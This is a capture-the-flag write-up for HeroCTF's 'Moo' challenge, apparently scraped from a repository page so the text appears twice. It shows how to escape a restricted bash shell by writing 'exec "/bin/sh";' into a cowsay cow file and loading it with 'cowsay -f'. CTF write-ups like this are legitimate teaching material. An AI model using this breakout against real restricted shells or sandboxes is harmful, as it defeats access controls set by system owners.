hero24/misc/moo/README.md

# misc/Moo
We are given SSH access to a machine. We drop into a restricted shell and must break out of it to read the flag.

```
ssh -p 11380 dyn05.heroctf.fr
user@dyn05.heroctf.fr's password:
Linux moo 6.1.0-25-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.106-3 (2024-08-26) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Oct 25 20:27:41 2024 from 149.102.226.202
 ______________________________________________________
/ Welcome dear CTF player! You can read the flag with: \
\ /bin/sudo /bin/cat /flag.txt. Or can you?...         /
 ------------------------------------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
```

When we try to run the commands, we see we're in a restricted shell:
```
user@moo:~$ /bin/sudo /bin/cat /flag.txt
bash: /bin/sudo: restricted: cannot specify `/' in command names
```

Let's take a look at our environment a bit with `env`:
```
bash: env: command not found
```

Next thing to do would be look at what our `PATH` is set to:
```
user@moo:~$ echo $PATH
/usr/local/rbin
```

Attempting to update our `PATH` with `export` fails as well:
```
user@moo:~$ PATH=/bin sudo id
bash: PATH: readonly variable
bash: sudo: command not found
```

Well, let's see what is actually available to us in the only `PATH` we have available:
```
user@moo:~$ ls -la $PATH
total 24
drwxr-xr-x 1 root root 4096 Oct 25 18:18 .
drwxr-xr-x 1 root root 4096 Oct 25 18:18 ..
lrwxrwxrwx 1 root root   17 Oct 25 18:18 cowsay -> /usr/games/cowsay
lrwxrwxrwx 1 root root   18 Oct 25 18:18 dircolors -> /usr/bin/dircolors
lrwxrwxrwx 1 root root    7 Oct 25 18:18 ls -> /bin/ls
-rwxr-xr-x 1 root root  206 Oct 25 17:35 rbash
-rwxr-xr-x 1 root root   54 Oct 25 17:35 vim
```

This reveals a few things:
- We are in a restricted bashshell
- We have `cowsay`

So we use `cowsay` as a the GTFObin that it is, however we cannot redirect output. Luckily we have
`vim`.

After putting our breakout (`exec "/bin/sh";`) into a file, we can then run it with `cowsay`:
```
cowsay -f tmp x
```

This gives us a full unrestricted shell, and we can now `cat` the flag:
```
PATH=/bin 
Hero{s0m3_s4cr3d_c0w}
```
add web/jinjatic 2024-10-25 21:23:01 +00:00			`# misc/Moo`
			`We are given SSH access to a machine. We drop into a restricted shell and must break out of it to read the flag.`

			```
			`ssh -p 11380 dyn05.heroctf.fr`
			`user@dyn05.heroctf.fr's password:`
			`Linux moo 6.1.0-25-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.106-3 (2024-08-26) x86_64`

			`The programs included with the Debian GNU/Linux system are free software;`
			`the exact distribution terms for each program are described in the`
			`individual files in /usr/share/doc/*/copyright.`

			`Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent`
			`permitted by applicable law.`
			`Last login: Fri Oct 25 20:27:41 2024 from 149.102.226.202`
			`______________________________________________________`
			`/ Welcome dear CTF player! You can read the flag with: \`
			`\ /bin/sudo /bin/cat /flag.txt. Or can you?... /`
			`------------------------------------------------------`
			`\ ^__^`
			`\ (oo)\_______`
			`(__)\ )\/\`
			`\|\|----w \|`
			`\|\| \|\|`
			```

			`When we try to run the commands, we see we're in a restricted shell:`
			```
			`user@moo:~$ /bin/sudo /bin/cat /flag.txt`
			bash: /bin/sudo: restricted: cannot specify `/' in command names
			```

			Let's take a look at our environment a bit with `env`:
			```
			`bash: env: command not found`
			```

			Next thing to do would be look at what our `PATH` is set to:
			```
			`user@moo:~$ echo $PATH`
			`/usr/local/rbin`
			```

			Attempting to update our `PATH` with `export` fails as well:
			```
			`user@moo:~$ PATH=/bin sudo id`
			`bash: PATH: readonly variable`
			`bash: sudo: command not found`
			```

			Well, let's see what is actually available to us in the only `PATH` we have available:
			```
			`user@moo:~$ ls -la $PATH`
			`total 24`
			`drwxr-xr-x 1 root root 4096 Oct 25 18:18 .`
			`drwxr-xr-x 1 root root 4096 Oct 25 18:18 ..`
			`lrwxrwxrwx 1 root root 17 Oct 25 18:18 cowsay -> /usr/games/cowsay`
			`lrwxrwxrwx 1 root root 18 Oct 25 18:18 dircolors -> /usr/bin/dircolors`
			`lrwxrwxrwx 1 root root 7 Oct 25 18:18 ls -> /bin/ls`
			`-rwxr-xr-x 1 root root 206 Oct 25 17:35 rbash`
			`-rwxr-xr-x 1 root root 54 Oct 25 17:35 vim`
			```

			`This reveals a few things:`
			`- We are in a restricted bashshell`
			- We have `cowsay`

			So we use `cowsay` as a the GTFObin that it is, however we cannot redirect output. Luckily we have
			`vim`.

			After putting our breakout (`exec "/bin/sh";`) into a file, we can then run it with `cowsay`:
			```
			`cowsay -f tmp x`
			```

			This gives us a full unrestricted shell, and we can now `cat` the flag:
			```
			`PATH=/bin`
			`Hero{s0m3_s4cr3d_c0w}`
			```